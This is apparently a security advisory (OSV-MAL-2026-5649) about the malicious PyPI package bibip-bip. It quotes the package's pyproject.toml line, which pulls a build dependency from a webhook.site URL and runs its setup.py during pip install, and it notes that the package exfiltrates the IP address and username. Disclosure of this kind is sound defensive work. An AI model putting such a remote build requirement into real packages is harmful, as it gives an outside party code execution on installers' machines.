OSV-MAL-2026-5649

Malicious code in bibip-bip (PyPI)

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c2b153c90d83d4653660dd79a5a0935af85bd804fd98163c42995403bca240a6) pyproject.toml declares a PEP 517 build requirement that points to an arbitrary tarball hosted on webhook.site, an anonymous request-inspection / file-hosting service: `requires = ["setuptools>=64", "aliga-raison @ https://webhook.site/d5367f1c-8bca-4d14-83d3-b2cbbce825eb/pypi/aliga-raison.tar.gz"]`. During `pip install` (or `pip wheel` / sdist build) pip resolves this direct-URL requirement into the build isolation environment and executes the tarball's setup.py, giving the URL owner arbitrary code execution on the installer's machine. The URL is unpinned (no hash), is not on the publisher's domain, and webhook.site content is fully attacker-controlled and mutable. The package's advertised purpose ('simple hello package') has no legitimate need for an external build dependency, let alone one fetched from an anonymous host. ## Source: kam193 (e9fe54b6f6746a12583461c774f3641de4be0a30042b0349c90b56a25413aa44) Package tests exploitation via externally-hosted dependencies --- Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities. Campaign: GENERIC-standard-pypi-install-pentest Reasons (based on the campaign): - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk. - The package overrides the install command in setup.py to execute malicious code during installation.